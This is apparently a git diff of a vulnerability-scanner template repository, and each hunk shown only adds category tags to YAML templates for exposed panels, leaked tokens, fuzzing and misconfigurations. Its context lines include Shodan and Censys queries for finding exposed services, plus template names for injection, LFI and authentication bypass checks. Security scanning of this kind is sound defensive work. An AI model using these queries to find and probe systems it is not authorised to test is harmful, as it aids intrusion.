max-request: 1 - tags: openbmcs,detect + tags: panel,openbmcs,detect http: - method: GET diff --git a/http/exposed-panels/opencpu-panel.yaml b/http/exposed-panels/opencpu-panel.yaml index c608602b81..87f2144565 100644 --- a/http/exposed-panels/opencpu-panel.yaml +++ b/http/exposed-panels/opencpu-panel.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: opencpu,oss + tags: panel,opencpu,oss http: - method: GET diff --git a/http/exposed-panels/openwrt/openwrt-luci-panel.yaml b/http/exposed-panels/openwrt/openwrt-luci-panel.yaml index 012bafe200..2cdcf7c7d2 100644 --- a/http/exposed-panels/openwrt/openwrt-luci-panel.yaml +++ b/http/exposed-panels/openwrt/openwrt-luci-panel.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"OpenWrt - LuCI" - tags: default-login,openwrt + tags: panel,default-login,openwrt http: - method: GET diff --git a/http/exposed-panels/sap-successfactors-detect.yaml b/http/exposed-panels/sap-successfactors-detect.yaml index 9c79d3f3c1..feac034d56 100644 --- a/http/exposed-panels/sap-successfactors-detect.yaml +++ b/http/exposed-panels/sap-successfactors-detect.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 2 shodan-query: title:"Login - SAP SuccessFactors" - tags: sap,detect + tags: panel,sap,detect http: - method: GET diff --git a/http/exposed-panels/satis-repository.yaml b/http/exposed-panels/satis-repository.yaml index 59c0c55d20..0a14d43aca 100644 --- a/http/exposed-panels/satis-repository.yaml +++ b/http/exposed-panels/satis-repository.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 1 shodan-query: html:"Satis" - tags: exposure,composer,satis + tags: panel,exposure,composer,satis http: - method: GET diff --git a/http/exposed-panels/server-backup-login.yaml b/http/exposed-panels/server-backup-login.yaml index 91b0a05ace..d30b16c686 100644 --- a/http/exposed-panels/server-backup-login.yaml +++ b/http/exposed-panels/server-backup-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: paneil,idera,edb + tags: panel,paneil,idera,edb http: - method: GET diff --git a/http/exposed-panels/unauth/tautulli-unauth.yaml b/http/exposed-panels/unauth/tautulli-unauth.yaml index 7fe96313ed..839392845f 100644 --- a/http/exposed-panels/unauth/tautulli-unauth.yaml +++ b/http/exposed-panels/unauth/tautulli-unauth.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: title:"Tautulli - Home" - tags: misconfig,tautulli,unauth,exposure + tags: panel,misconfig,tautulli,unauth,exposure http: - method: GET diff --git a/http/exposed-panels/ws_ftp-server-web-transfer.yaml b/http/exposed-panels/ws_ftp-server-web-transfer.yaml index 15a3333fd5..855bf1f71b 100644 --- a/http/exposed-panels/ws_ftp-server-web-transfer.yaml +++ b/http/exposed-panels/ws_ftp-server-web-transfer.yaml @@ -16,7 +16,7 @@ info: product: ws_ftp shodan-query: http.title:"WS_FTP Server Web Transfer" censys-query: services.http.request.uri="*/ThinClient/WTM/public/index.html" - tags: panel,ws_ftp + tags: panel,ws_ftp,progress http: - method: GET diff --git a/http/exposures/logs/ffserver-status.yaml b/http/exposures/logs/ffserver-status.yaml index ff2670714d..378eeecdf6 100644 --- a/http/exposures/logs/ffserver-status.yaml +++ b/http/exposures/logs/ffserver-status.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"ffserver Status" - tags: exposures,logs,ffserver + tags: exposure,exposures,logs,ffserver http: - method: GET diff --git a/http/exposures/tokens/finicity/finicity-clientsecret.yaml b/http/exposures/tokens/finicity/finicity-clientsecret.yaml index 166b4e467f..a0a78a62da 100644 --- a/http/exposures/tokens/finicity/finicity-clientsecret.yaml +++ b/http/exposures/tokens/finicity/finicity-clientsecret.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: finicity,file,token + tags: exposure,finicity,file,token http: - method: GET diff --git a/http/exposures/tokens/finicity/finicity-token.yaml b/http/exposures/tokens/finicity/finicity-token.yaml index 9f072eb8c7..1ab59093ed 100644 --- a/http/exposures/tokens/finicity/finicity-token.yaml +++ b/http/exposures/tokens/finicity/finicity-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: finicity,file,token + tags: exposure,finicity,file,token http: - method: GET diff --git a/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml b/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml index b1279f96eb..57d239ca2b 100644 --- a/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml +++ b/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: finnhub,file,token + tags: exposure,finnhub,file,token http: - method: GET diff --git a/http/exposures/tokens/gitter/gitter-token.yaml b/http/exposures/tokens/gitter/gitter-token.yaml index f8293360a3..39ac52e4b7 100644 --- a/http/exposures/tokens/gitter/gitter-token.yaml +++ b/http/exposures/tokens/gitter/gitter-token.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: gitter,file,keys + tags: exposure,gitter,file,keys http: - method: GET diff --git a/http/fuzzing/cache-poisoning-fuzz.yaml b/http/fuzzing/cache-poisoning-fuzz.yaml index e7d8f057fa..51ee64d28d 100644 --- a/http/fuzzing/cache-poisoning-fuzz.yaml +++ b/http/fuzzing/cache-poisoning-fuzz.yaml @@ -9,7 +9,7 @@ info: - https://portswigger.net/web-security/web-cache-poisoning metadata: max-request: 5834 - tags: fuzz,cache + tags: fuzzing,fuzz,cache http: - raw: diff --git a/http/fuzzing/header-command-injection.yaml b/http/fuzzing/header-command-injection.yaml index 37e89e1c57..3e9e136cf8 100644 --- a/http/fuzzing/header-command-injection.yaml +++ b/http/fuzzing/header-command-injection.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-77 metadata: max-request: 7650 - tags: fuzz,rce + tags: fuzzing,fuzz,rce http: - raw: diff --git a/http/fuzzing/iis-shortname.yaml b/http/fuzzing/iis-shortname.yaml index ba912c1a78..6d65906f9a 100644 --- a/http/fuzzing/iis-shortname.yaml +++ b/http/fuzzing/iis-shortname.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-200 metadata: max-request: 4 - tags: fuzz,edb + tags: fuzzing,fuzz,edb http: - raw: diff --git a/http/fuzzing/linux-lfi-fuzzing.yaml b/http/fuzzing/linux-lfi-fuzzing.yaml index f07698d2f8..88cdff7248 100644 --- a/http/fuzzing/linux-lfi-fuzzing.yaml +++ b/http/fuzzing/linux-lfi-fuzzing.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 22 - tags: linux,lfi,fuzz + tags: fuzzing,linux,lfi,fuzz http: - method: GET diff --git a/http/fuzzing/mdb-database-file.yaml b/http/fuzzing/mdb-database-file.yaml index 50bac14fbc..41561c4a56 100644 --- a/http/fuzzing/mdb-database-file.yaml +++ b/http/fuzzing/mdb-database-file.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 341 - tags: fuzz,mdb,asp + tags: fuzzing,fuzz,mdb,asp http: - raw: diff --git a/http/fuzzing/prestashop-module-fuzz.yaml b/http/fuzzing/prestashop-module-fuzz.yaml index 296f75cde1..666c558b68 100644 --- a/http/fuzzing/prestashop-module-fuzz.yaml +++ b/http/fuzzing/prestashop-module-fuzz.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 639 - tags: fuzz,prestashop + tags: fuzzing,fuzz,prestashop http: - raw: diff --git a/http/fuzzing/ssrf-via-proxy.yaml b/http/fuzzing/ssrf-via-proxy.yaml index 092b19e59a..410676244f 100644 --- a/http/fuzzing/ssrf-via-proxy.yaml +++ b/http/fuzzing/ssrf-via-proxy.yaml @@ -10,7 +10,7 @@ info: - https://twitter.com/ImoJOnDz/status/1649089777629827072 metadata: max-request: 9 - tags: ssrf,proxy,oast,fuzz + tags: fuzzing,ssrf,proxy,oast,fuzz http: - payloads: diff --git a/http/fuzzing/valid-gmail-check.yaml b/http/fuzzing/valid-gmail-check.yaml index a8df6e05ab..afa6ed7ded 100644 --- a/http/fuzzing/valid-gmail-check.yaml +++ b/http/fuzzing/valid-gmail-check.yaml @@ -8,7 +8,7 @@ info: - https://github.com/dievus/geeMailUserFinder metadata: max-request: 1 - tags: fuzz,gmail + tags: fuzzing,fuzz,gmail self-contained: true diff --git a/http/fuzzing/waf-fuzz.yaml b/http/fuzzing/waf-fuzz.yaml index d50129eed1..1db3282384 100644 --- a/http/fuzzing/waf-fuzz.yaml +++ b/http/fuzzing/waf-fuzz.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 58 - tags: waf,tech,fuzz + tags: fuzzing,waf,tech,fuzz http: - raw: diff --git a/http/fuzzing/wordpress-plugins-detect.yaml b/http/fuzzing/wordpress-plugins-detect.yaml index 93285d39f7..fe019d2a84 100644 --- a/http/fuzzing/wordpress-plugins-detect.yaml +++ b/http/fuzzing/wordpress-plugins-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 98135 - tags: fuzz,wordpress + tags: fuzzing,fuzz,wordpress http: - raw: diff --git a/http/fuzzing/wordpress-themes-detect.yaml b/http/fuzzing/wordpress-themes-detect.yaml index c6f7c7a2ee..d9ad0c37a6 100644 --- a/http/fuzzing/wordpress-themes-detect.yaml +++ b/http/fuzzing/wordpress-themes-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 24434 - tags: fuzz,wordpress + tags: fuzzing,fuzz,wordpress http: - raw: diff --git a/http/fuzzing/wordpress-weak-credentials.yaml b/http/fuzzing/wordpress-weak-credentials.yaml index 9b2b887072..dfa8b4350e 100644 --- a/http/fuzzing/wordpress-weak-credentials.yaml +++ b/http/fuzzing/wordpress-weak-credentials.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-1391 metadata: max-request: 276 - tags: wordpress,default-login,fuzz + tags: fuzzing,wordpress,default-login,fuzz http: - raw: diff --git a/http/fuzzing/xff-403-bypass.yaml b/http/fuzzing/xff-403-bypass.yaml index 36bcd56356..ebf0365524 100644 --- a/http/fuzzing/xff-403-bypass.yaml +++ b/http/fuzzing/xff-403-bypass.yaml @@ -7,7 +7,7 @@ info: description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. metadata: max-request: 3 - tags: fuzz + tags: fuzzing,fuzz http: - raw: diff --git a/http/miscellaneous/addeventlistener-detect.yaml b/http/miscellaneous/addeventlistener-detect.yaml index bdb36cf188..c4e2e797a6 100644 --- a/http/miscellaneous/addeventlistener-detect.yaml +++ b/http/miscellaneous/addeventlistener-detect.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-79 metadata: max-request: 1 - tags: xss,misc + tags: miscellaneous,xss,misc http: - method: GET diff --git a/http/miscellaneous/apple-app-site-association.yaml b/http/miscellaneous/apple-app-site-association.yaml index 85a8797703..1f95152fda 100644 --- a/http/miscellaneous/apple-app-site-association.yaml +++ b/http/miscellaneous/apple-app-site-association.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 3 - tags: misc,apple + tags: miscellaneous,misc,apple http: - method: GET diff --git a/http/miscellaneous/aws-ecs-container-agent-tasks.yaml b/http/miscellaneous/aws-ecs-container-agent-tasks.yaml index 0b01014515..771ed9056a 100644 --- a/http/miscellaneous/aws-ecs-container-agent-tasks.yaml +++ b/http/miscellaneous/aws-ecs-container-agent-tasks.yaml @@ -9,7 +9,7 @@ info: - https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect metadata: max-request: 2 - tags: aws,docker,ec2,misc + tags: miscellaneous,aws,docker,ec2,misc http: - method: GET diff --git a/http/miscellaneous/clientaccesspolicy.yaml b/http/miscellaneous/clientaccesspolicy.yaml index 729e96c349..2f78e9d3e0 100644 --- a/http/miscellaneous/clientaccesspolicy.yaml +++ b/http/miscellaneous/clientaccesspolicy.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: misc + tags: miscellaneous,misc http: - method: GET diff --git a/http/miscellaneous/crypto-mining-malware.yaml b/http/miscellaneous/crypto-mining-malware.yaml index 1fc3cc984c..4988f2547a 100644 --- a/http/miscellaneous/crypto-mining-malware.yaml +++ b/http/miscellaneous/crypto-mining-malware.yaml @@ -10,7 +10,7 @@ info: - https://github.com/xd4rker/MinerBlock/blob/master/assets/filters.txt metadata: max-request: 1 - tags: malware,crypto,mining,misc,generic + tags: miscellaneous,malware,crypto,mining,misc,generic http: - method: GET diff --git a/http/miscellaneous/defaced-website-detect.yaml b/http/miscellaneous/defaced-website-detect.yaml index 2c60ac489a..a5f1c29b18 100644 --- a/http/miscellaneous/defaced-website-detect.yaml +++ b/http/miscellaneous/defaced-website-detect.yaml @@ -9,7 +9,7 @@ info: verified: 'true' max-request: 1 shodan-query: http.title:"Hacked By" - tags: defacement,misc + tags: miscellaneous,defacement,misc http: - method: GET diff --git a/http/miscellaneous/detect-dns-over-https.yaml b/http/miscellaneous/detect-dns-over-https.yaml index 239f2cc3e5..1f9827a067 100644 --- a/http/miscellaneous/detect-dns-over-https.yaml +++ b/http/miscellaneous/detect-dns-over-https.yaml @@ -11,7 +11,7 @@ info: - https://developers.cloudflare.com/1.1.1.1/dns-over-https/wireformat metadata: max-request: 1 - tags: dns,doh,misc + tags: miscellaneous,dns,doh,misc http: - method: GET diff --git a/http/miscellaneous/dir-listing.yaml b/http/miscellaneous/dir-listing.yaml index dc8be52eb1..3e29698add 100644 --- a/http/miscellaneous/dir-listing.yaml +++ b/http/miscellaneous/dir-listing.yaml @@ -8,7 +8,7 @@ info: - https://portswigger.net/kb/issues/00600100_directory-listing metadata: max-request: 1 - tags: misc,generic + tags: miscellaneous,misc,generic http: - method: GET diff --git a/http/miscellaneous/email-extractor.yaml b/http/miscellaneous/email-extractor.yaml index eb86d2a897..dc7dcb44ce 100644 --- a/http/miscellaneous/email-extractor.yaml +++ b/http/miscellaneous/email-extractor.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: misc,email,generic + tags: miscellaneous,misc,email,generic http: - method: GET diff --git a/http/miscellaneous/exposed-file-upload-form.yaml b/http/miscellaneous/exposed-file-upload-form.yaml index df8da57eec..82d7a1de1c 100644 --- a/http/miscellaneous/exposed-file-upload-form.yaml +++ b/http/miscellaneous/exposed-file-upload-form.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"multipart/form-data" html:"file" - tags: exposure,upload,form,misc,generic + tags: miscellaneous,exposure,upload,form,misc,generic http: - method: GET diff --git a/http/miscellaneous/external-service-interaction.yaml b/http/miscellaneous/external-service-interaction.yaml index 2c3c06b074..24ef150f92 100644 --- a/http/miscellaneous/external-service-interaction.yaml +++ b/http/miscellaneous/external-service-interaction.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-918,CWE-406 metadata: max-request: 1 - tags: http,misc,oast + tags: miscellaneous,http,misc,oast http: - method: GET diff --git a/http/miscellaneous/firebase-database-extractor.yaml b/http/miscellaneous/firebase-database-extractor.yaml index abb7e41d1f..3fcaff1982 100644 --- a/http/miscellaneous/firebase-database-extractor.yaml +++ b/http/miscellaneous/firebase-database-extractor.yaml @@ -7,7 +7,7 @@ info: description: Extract Firebase Database metadata: max-request: 1 - tags: firebase,misc + tags: miscellaneous,firebase,misc http: - method: GET diff --git a/http/miscellaneous/google-floc-disabled.yaml b/http/miscellaneous/google-floc-disabled.yaml index a8c969254b..66eb939cb3 100644 --- a/http/miscellaneous/google-floc-disabled.yaml +++ b/http/miscellaneous/google-floc-disabled.yaml @@ -9,7 +9,7 @@ info: - https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/ metadata: max-request: 1 - tags: google,floc,misc + tags: miscellaneous,google,floc,misc http: - method: GET diff --git a/http/miscellaneous/gpc-json.yaml b/http/miscellaneous/gpc-json.yaml index c426f0d41b..7e4f61d840 100644 --- a/http/miscellaneous/gpc-json.yaml +++ b/http/miscellaneous/gpc-json.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 2 - tags: misc,generic,gpc + tags: miscellaneous,misc,generic,gpc http: - method: GET diff --git a/http/miscellaneous/htaccess-config.yaml b/http/miscellaneous/htaccess-config.yaml index 6b36f95182..f0c7c3e02c 100644 --- a/http/miscellaneous/htaccess-config.yaml +++ b/http/miscellaneous/htaccess-config.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 6 - tags: misc,config + tags: miscellaneous,misc,config http: - method: GET diff --git a/http/miscellaneous/http-trace.yaml b/http/miscellaneous/http-trace.yaml index ed5f3e0b90..3ffa78f9fa 100644 --- a/http/miscellaneous/http-trace.yaml +++ b/http/miscellaneous/http-trace.yaml @@ -8,7 +8,7 @@ info: - https://www.blackhillsinfosec.com/three-minutes-with-the-http-trace-method/ metadata: max-request: 2 - tags: misc,generic + tags: miscellaneous,misc,generic http: - method: TRACE diff --git a/http/miscellaneous/joomla-htaccess.yaml b/http/miscellaneous/joomla-htaccess.yaml index 38a84b59d3..a5bf5ccab7 100644 --- a/http/miscellaneous/joomla-htaccess.yaml +++ b/http/miscellaneous/joomla-htaccess.yaml @@ -7,7 +7,7 @@ info: description: Joomla! has an htaccess file to store configurations about HTTP config, directory listing, etc. metadata: max-request: 1 - tags: misc,joomla + tags: miscellaneous,misc,joomla http: - method: GET diff --git a/http/miscellaneous/joomla-manifest-file.yaml b/http/miscellaneous/joomla-manifest-file.yaml index 88814ea4a5..633bf9fedc 100644 --- a/http/miscellaneous/joomla-manifest-file.yaml +++ b/http/miscellaneous/joomla-manifest-file.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: misc,joomla + tags: miscellaneous,misc,joomla http: - method: GET diff --git a/http/miscellaneous/microsoft-azure-error.yaml b/http/miscellaneous/microsoft-azure-error.yaml index cd8a2ce87e..2054749166 100644 --- a/http/miscellaneous/microsoft-azure-error.yaml +++ b/http/miscellaneous/microsoft-azure-error.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: title:"Microsoft Azure Web App - Error 404" - tags: error,azure,microsoft,misc + tags: miscellaneous,error,azure,microsoft,misc http: - method: GET diff --git a/http/miscellaneous/moodle-changelog.yaml b/http/miscellaneous/moodle-changelog.yaml index 3157afaad5..70c0797e82 100644 --- a/http/miscellaneous/moodle-changelog.yaml +++ b/http/miscellaneous/moodle-changelog.yaml @@ -7,7 +7,7 @@ info: description: Moodle has a file which describes API changes in core libraries and APIs, and can be used to discover Moodle version. metadata: max-request: 1 - tags: misc,moodle + tags: miscellaneous,misc,moodle http: - method: GET diff --git a/http/miscellaneous/netflix-conductor-version.yaml b/http/miscellaneous/netflix-conductor-version.yaml index e040287a1d..550a607728 100644 --- a/http/miscellaneous/netflix-conductor-version.yaml +++ b/http/miscellaneous/netflix-conductor-version.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 2 shodan-query: http.title:"Conductor UI", http.title:"Workflow UI" - tags: tech,netflix,conductor,api,misc + tags: miscellaneous,tech,netflix,conductor,api,misc http: - method: GET diff --git a/http/miscellaneous/ntlm-directories.yaml b/http/miscellaneous/ntlm-directories.yaml index fbf7758778..29ea458a33 100644 --- a/http/miscellaneous/ntlm-directories.yaml +++ b/http/miscellaneous/ntlm-directories.yaml @@ -8,7 +8,7 @@ info: - https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666 metadata: max-request: 47 - tags: misc,fuzz,windows + tags: miscellaneous,misc,fuzz,windows http: - raw: diff --git a/http/miscellaneous/old-copyright.yaml b/http/miscellaneous/old-copyright.yaml index 52e3fd7454..cd054d900b 100644 --- a/http/miscellaneous/old-copyright.yaml +++ b/http/miscellaneous/old-copyright.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true max-request: 1 - tags: misc,generic + tags: miscellaneous,misc,generic http: - method: GET diff --git a/http/miscellaneous/options-method.yaml b/http/miscellaneous/options-method.yaml index f96cdfe247..e23ec8c837 100644 --- a/http/miscellaneous/options-method.yaml +++ b/http/miscellaneous/options-method.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: misc,generic + tags: miscellaneous,misc,generic http: - method: OPTIONS diff --git a/http/miscellaneous/rdap-whois.yaml b/http/miscellaneous/rdap-whois.yaml index a9b75fcaf9..46c9a1ad71 100644 --- a/http/miscellaneous/rdap-whois.yaml +++ b/http/miscellaneous/rdap-whois.yaml @@ -16,7 +16,7 @@ info: metadata: verified: true max-request: 1 - tags: whois,rdap,osint,misc + tags: miscellaneous,whois,rdap,osint,misc http: - method: GET diff --git a/http/miscellaneous/robots-txt-endpoint.yaml b/http/miscellaneous/robots-txt-endpoint.yaml index c0239c46d8..ffd95964cd 100644 --- a/http/miscellaneous/robots-txt-endpoint.yaml +++ b/http/miscellaneous/robots-txt-endpoint.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 2 - tags: misc,generic + tags: miscellaneous,misc,generic http: - method: GET diff --git a/http/miscellaneous/robots-txt.yaml b/http/miscellaneous/robots-txt.yaml index 7d0730598d..9a34a3ec64 100644 --- a/http/miscellaneous/robots-txt.yaml +++ b/http/miscellaneous/robots-txt.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: misc,generic + tags: miscellaneous,misc,generic http: - method: GET diff --git a/http/miscellaneous/security-txt.yaml b/http/miscellaneous/security-txt.yaml index a3d6463bb9..90193a1063 100644 --- a/http/miscellaneous/security-txt.yaml +++ b/http/miscellaneous/security-txt.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 2 shodan-query: http.securitytxt:contact http.status:200 - tags: misc,generic + tags: miscellaneous,misc,generic http: - method: GET diff --git a/http/miscellaneous/sitemap-detect.yaml b/http/miscellaneous/sitemap-detect.yaml index d7069a6c82..3a392de9b9 100644 --- a/http/miscellaneous/sitemap-detect.yaml +++ b/http/miscellaneous/sitemap-detect.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 3 google-query: intext:"sitemap" filetype:txt,filetype:xml inurl:sitemap,inurl:"/sitemap.xsd" ext:xsd - tags: misc,generic,sitemap + tags: miscellaneous,misc,generic,sitemap http: - method: GET diff --git a/http/miscellaneous/spnego-detect.yaml b/http/miscellaneous/spnego-detect.yaml index 7543ca62f4..e131286284 100644 --- a/http/miscellaneous/spnego-detect.yaml +++ b/http/miscellaneous/spnego-detect.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: 'www-authenticate: negotiate' - tags: misc,windows,spnego + tags: miscellaneous,misc,windows,spnego http: - method: GET diff --git a/http/miscellaneous/x-recruiting-header.yaml b/http/miscellaneous/x-recruiting-header.yaml index 56b64aea2a..47be49c8f9 100644 --- a/http/miscellaneous/x-recruiting-header.yaml +++ b/http/miscellaneous/x-recruiting-header.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: "X-Recruiting:" - tags: misc,hiring,jobs,employment,generic + tags: miscellaneous,misc,hiring,jobs,employment,generic http: - method: GET diff --git a/http/miscellaneous/xml-schema-detect.yaml b/http/miscellaneous/xml-schema-detect.yaml index 5d048a0dd2..d89b728b37 100644 --- a/http/miscellaneous/xml-schema-detect.yaml +++ b/http/miscellaneous/xml-schema-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: misc,generic + tags: miscellaneous,misc,generic http: - method: GET diff --git a/http/misconfiguration/aws/cdn-cache-poisoning.yaml b/http/misconfiguration/aws/cdn-cache-poisoning.yaml index 9909c511a4..8b001a8088 100644 --- a/http/misconfiguration/aws/cdn-cache-poisoning.yaml +++ b/http/misconfiguration/aws/cdn-cache-poisoning.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true shodan-query: "X-Amz-Server-Side-Encryption" - tags: cache,aws,poisoning,cdn + tags: misconfig,cache,aws,poisoning,cdn variables: string: "{{to_lower(rand_base(8))}}={{to_lower(rand_base(8))}}" diff --git a/http/misconfiguration/clickhouse-unauth-api.yaml b/http/misconfiguration/clickhouse-unauth-api.yaml index 8a8675129c..dcdb5d3dcc 100644 --- a/http/misconfiguration/clickhouse-unauth-api.yaml +++ b/http/misconfiguration/clickhouse-unauth-api.yaml @@ -12,7 +12,7 @@ info: max-request: 1 shodan-query: "X-ClickHouse-Summary" fofa-query: "X-ClickHouse-Summary" - tags: clickhouse,unauth,disclosure + tags: misconfig,clickhouse,unauth,disclosure http: - method: GET diff --git a/http/misconfiguration/dlink-config-dump.yaml b/http/misconfiguration/dlink-config-dump.yaml index 3ee999558f..0b8c9b723c 100644 --- a/http/misconfiguration/dlink-config-dump.yaml +++ b/http/misconfiguration/dlink-config-dump.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: title:"D-LINK" - tags: config,dump,dlink,auth-bypass,disclosure + tags: misconfig,config,dump,dlink,auth-bypass,disclosure http: - method: GET diff --git a/http/misconfiguration/exposed-service-now.yaml b/http/misconfiguration/exposed-service-now.yaml index 2d8ac2aae1..b3eeb36846 100644 --- a/http/misconfiguration/exposed-service-now.yaml +++ b/http/misconfiguration/exposed-service-now.yaml @@ -10,7 +10,7 @@ info: - https://github.com/leo-hildegarde/SnowDownKB/ metadata: max-request: 1 - tags: servicenow + tags: misconfig,servicenow http: - method: GET diff --git a/http/misconfiguration/exposed-sqlite-manager.yaml b/http/misconfiguration/exposed-sqlite-manager.yaml index c8f2dd6f12..aabf4eeffa 100644 --- a/http/misconfiguration/exposed-sqlite-manager.yaml +++ b/http/misconfiguration/exposed-sqlite-manager.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/5003 metadata: max-request: 3 - tags: misconfig,sqlite,edb + tags: misconfig,sqlite,edb,sqli http: - method: GET diff --git a/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml b/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml index 7dbebff007..1a8fd61a34 100644 --- a/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml +++ b/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml @@ -14,7 +14,7 @@ info: shodan-query: title:"H2O Flow" verified: true max-request: 1 - tags: h2o-3,h2o,info-leak,lfi + tags: misconfig,h2o-3,h2o,info-leak,lfi http: - raw: diff --git a/http/misconfiguration/installer/zenphoto-setup.yaml b/http/misconfiguration/installer/zenphoto-setup.yaml index 1cabb3915b..4b10c13cd5 100644 --- a/http/misconfiguration/installer/zenphoto-setup.yaml +++ b/http/misconfiguration/installer/zenphoto-setup.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 4 shodan-query: title:"Zenphoto install" - tags: panel,zenphoto,setup,installer + tags: misconfig,panel,zenphoto,setup,installer http: - method: GET diff --git a/http/misconfiguration/misconfigured-docker.yaml b/http/misconfiguration/misconfigured-docker.yaml index 6d9ae15ab9..fb6d61720b 100644 --- a/http/misconfiguration/misconfigured-docker.yaml +++ b/http/misconfiguration/misconfigured-docker.yaml @@ -9,7 +9,7 @@ info: - https://madhuakula.com/content/attacking-and-auditing-docker-containers-using-opensource/attacking-docker-containers/misconfiguration.html metadata: max-request: 1 - tags: docker,unauth,devops + tags: misconfig,docker,unauth,devops http: - method: GET diff --git a/http/misconfiguration/nacos/nacos-create-user.yaml b/http/misconfiguration/nacos/nacos-create-user.yaml index 40b5d73d48..66df0b8bff 100644 --- a/http/misconfiguration/nacos/nacos-create-user.yaml +++ b/http/misconfiguration/nacos/nacos-create-user.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 3 shodan-query: title:"Nacos" - tags: nacos,unauth,bypass,instrusive + tags: misconfig,nacos,unauth,bypass,instrusive http: - raw: diff --git a/http/misconfiguration/php/php-composer-binary.yaml b/http/misconfiguration/php/php-composer-binary.yaml index bc6e0b2a51..177b850e21 100644 --- a/http/misconfiguration/php/php-composer-binary.yaml +++ b/http/misconfiguration/php/php-composer-binary.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 verified: true - tags: php,composer,exposure + tags: misconfig,php,composer,exposure http: - method: GET diff --git a/http/misconfiguration/selenium-exposure.yaml b/http/misconfiguration/selenium-exposure.yaml index d08069d5ca..3392f8f28c 100644 --- a/http/misconfiguration/selenium-exposure.yaml +++ b/http/misconfiguration/selenium-exposure.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: "/wd/hub" - tags: selenium,misconfiguration,rce,chromium + tags: misconfig,selenium,misconfiguration,rce,chromium http: - method: GET diff --git a/http/misconfiguration/tls-sni-proxy.yaml b/http/misconfiguration/tls-sni-proxy.yaml index a399c390c9..3442302195 100644 --- a/http/misconfiguration/tls-sni-proxy.yaml +++ b/http/misconfiguration/tls-sni-proxy.yaml @@ -9,7 +9,7 @@ info: - https://www.bamsoftware.com/computers/sniproxy/ metadata: max-request: 1 - tags: ssrf,oast,tls,sni,proxy + tags: misconfig,ssrf,oast,tls,sni,proxy http: - raw: diff --git a/http/misconfiguration/tomcat-stacktraces.yaml b/http/misconfiguration/tomcat-stacktraces.yaml index 876539da2d..8dc0dcc610 100644 --- a/http/misconfiguration/tomcat-stacktraces.yaml +++ b/http/misconfiguration/tomcat-stacktraces.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Apache Tomcat" - tags: tech,tomcat,apache + tags: misconfig,tech,tomcat,apache http: - method: GET diff --git a/http/misconfiguration/unauth-temporal-web-ui.yaml b/http/misconfiguration/unauth-temporal-web-ui.yaml index 29f3b9911a..2a67b260c3 100644 --- a/http/misconfiguration/unauth-temporal-web-ui.yaml +++ b/http/misconfiguration/unauth-temporal-web-ui.yaml @@ -15,7 +15,7 